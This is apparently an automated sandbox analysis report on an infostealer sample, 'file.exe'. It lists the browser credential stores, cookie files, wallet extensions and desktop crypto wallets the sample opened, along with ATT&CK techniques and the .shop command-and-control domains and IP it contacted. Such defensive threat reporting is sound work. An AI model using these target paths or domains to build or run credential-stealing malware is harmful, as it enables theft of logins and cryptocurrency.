              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              321
              Security Software Discovery
              Remote Services1
              Credential API Hooking
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              1
              Credential API Hooking
              11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares3
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS112
              System Information Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraHEUR/AGEN.1352800
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              greetclassifytalk.shop1%VirustotalBrowse
              fp2e7a.wpc.phicdn.net0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://support.microsof0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              shortsvelventysjo.shop0%Avira URL Cloudsafe
              incredibleextedwj.shop0%Avira URL Cloudsafe
              tolerateilusidjukl.shop0%Avira URL Cloudsafe
              https://greetclassifytalk.shop/US5i0%Avira URL Cloudsafe
              https://greetclassifytalk.shop/api100%Avira URL Cloudmalware
              https://greetclassifytalk.shop/Tx=0%Avira URL Cloudsafe
              liabilitynighstjsko.shop0%Avira URL Cloudsafe
              https://greetclassifytalk.shop/apiO0%Avira URL Cloudsafe
              tolerateilusidjukl.shop14%VirustotalBrowse
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              shortsvelventysjo.shop16%VirustotalBrowse
              shatterbreathepsw.shop0%Avira URL Cloudsafe
              incredibleextedwj.shop14%VirustotalBrowse
              https://greetclassifytalk.shop/0%Avira URL Cloudsafe
              https://greetclassifytalk.shop/api12%VirustotalBrowse
              demonstationfukewko.shop0%Avira URL Cloudsafe
              greetclassifytalk.shop0%Avira URL Cloudsafe
              shatterbreathepsw.shop17%VirustotalBrowse
              https://greetclassifytalk.shop/G0%Avira URL Cloudsafe
              productivelookewr.shop0%Avira URL Cloudsafe
              https://greetclassifytalk.shop/ziRL0%Avira URL Cloudsafe
              alcojoldwograpciw.shop0%Avira URL Cloudsafe
              greetclassifytalk.shop1%VirustotalBrowse
              productivelookewr.shop16%VirustotalBrowse
              https://greetclassifytalk.shop/1%VirustotalBrowse
              alcojoldwograpciw.shop17%VirustotalBrowse
              liabilitynighstjsko.shop17%VirustotalBrowse
              demonstationfukewko.shop18%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              greetclassifytalk.shop
              104.21.51.78
              truetrueunknown
              fp2e7a.wpc.phicdn.net
              192.229.211.108
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              incredibleextedwj.shoptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              shortsvelventysjo.shoptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              tolerateilusidjukl.shoptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://greetclassifytalk.shop/apitrue
              • 12%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              liabilitynighstjsko.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              shatterbreathepsw.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              demonstationfukewko.shoptrue
              • 18%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              greetclassifytalk.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              productivelookewr.shoptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              alcojoldwograpciw.shoptrue
              • 17%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://greetclassifytalk.shop/US5ifile.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748141502.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://greetclassifytalk.shop/Tx=file.exe, 00000000.00000003.1686142545.000000000387F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://greetclassifytalk.shop/apiOfile.exe, 00000000.00000003.1686225301.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1676781567.00000000038CC000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1676781567.00000000038CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://greetclassifytalk.shop/file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1686225301.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676472111.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1686178285.000000000387F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748141502.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676279859.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://greetclassifytalk.shop/Gfile.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748141502.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://greetclassifytalk.shop/ziRLfile.exe, 00000000.00000003.1676472111.00000000009E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://support.microsoffile.exe, 00000000.00000003.1676781567.00000000038CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.51.78
                                                greetclassifytalk.shopUnited States
                                                13335CLOUDFLARENETUStrue
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1431577
                                                Start date and time:2024-04-25 13:32:08 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 29s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:1
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:file.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 92%
                                                • Number of executed functions: 36
                                                • Number of non-executed functions: 51
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated
                                                • Excluded IPs from analysis (whitelisted): 13.85.23.86, 23.47.204.74, 23.47.204.65, 13.85.23.206
                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                13:32:58API Interceptor8x Sleep call for process: file.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
